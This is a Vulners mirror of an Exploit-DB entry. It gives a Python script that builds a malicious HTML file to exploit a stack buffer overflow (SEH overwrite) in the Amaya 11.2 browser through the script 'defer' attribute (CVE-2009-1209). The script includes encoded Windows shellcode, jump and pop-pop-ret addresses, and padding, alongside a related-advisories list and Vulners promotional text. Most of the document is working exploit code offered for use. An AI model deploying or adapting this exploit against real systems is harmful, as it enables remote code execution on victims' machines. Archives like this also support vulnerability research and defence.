Lucene search
+L

Amaya 11.2 - W3C Editor/Browser (defer) Remote Buffer Overflow (SEH)

🗓️ 03 Aug 2009 00:00:00Reported by His0k4Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Amaya 11.2 W3C Editor/Browser Remote Buffer Overflow (SEH) exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-1209
30 Mar 200900:00
circl
CVE
CVE-2009-1209
1 Apr 200910:00
cve
Cvelist
CVE-2009-1209
1 Apr 200910:00
cvelist
Exploit DB
Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow (PoC)
30 Mar 200900:00
exploitdb
Exploit DB
Amaya 11.1 - W3C Editor/Browser 'defer' Remote Stack Overflow
30 Mar 200900:00
exploitdb
NVD
CVE-2009-1209
1 Apr 200910:30
nvd
Prion
Stack overflow
1 Apr 200910:30
prion
seebug.org
W3C Amaya HTML script标签栈溢出漏洞
2 Apr 200900:00
seebug
UbuntuCve
CVE-2009-1209
1 Apr 200910:30
ubuntucve
#!/usr/bin/python
# _  _   _         __    _     _ _
#| || | (_)  ___  /  \  | |__ | | |
#| __ | | | (_-< | () | | / / |_  _|
#|_||_| |_| /__/  \__/  |_\_\   |_|
#
#[+] Bug :	 Amaya 11.2 W3C Editor/Browser (defer) Remote BOF Exploit (SEH)
#[+] Tested on : Xp sp3 (en) under (vb)
#[+] Refer : 	 http://www.milw0rm.com/exploits/8314
#[+] Exploit : 	 His0k4
#[+] Greetz : 	 All friends (DZ)

#[x] Note : The html file must be browsed from a webserver

#win32_exec calc encoded with alpha2=>374 bytes.
shellcode = (
"JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
"TiKyosYyyN8YzN9IT4utL4SkoqRSwcUOJKKJ7rMSzKKLIrkDysv"
"cONtBUOjKrQCwEscPlFEWcWJJVuk9pPkCPqqMeokZTQPKLTkoQa"
"ws8qYJFZmKLsbOVZBVvxEzfPdOwnQ921l6Q4OOyN362JfnrQSmU"
"kkZr1e4OdhgnQLISp9gkKZIntL7qa5Sl4QroV5vUKDhxKyR3KSP"
"MjTrMJvKnbVnlTLkKFOyPozWf7NiqgXcTQVkMDbKqZtBuOXkT1p"
"jusNTJkL4cOMmPszZmLtkmQsbRWUKppS6SpMSQrilNum5nMYmL8"
"k8ok2NSLjKkJ32WzA")

payload =  "<script defer=\""
payload += "\x41"*6914		#change this value if needed
payload += "\x74\x06\x41\x41"	#short jump
payload += "\x50\x1A\x03\x10"	#pop pop ret somewhere
payload += "\x61"*13	# popad
payload += "\x52\xC3"	# push edx,retn C3 not mangled ouf!
payload += "\x44"*668	# padding
payload += shellcode
payload += "\x45"*5000	# result
payload += "\">"

try:
    out_file = open("exploit.html","w")
    out_file.write(payload)
    out_file.close()
    print("\nExploit file created!\n")
except:
    print "Error"

# milw0rm.com [2009-08-03]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.12369
33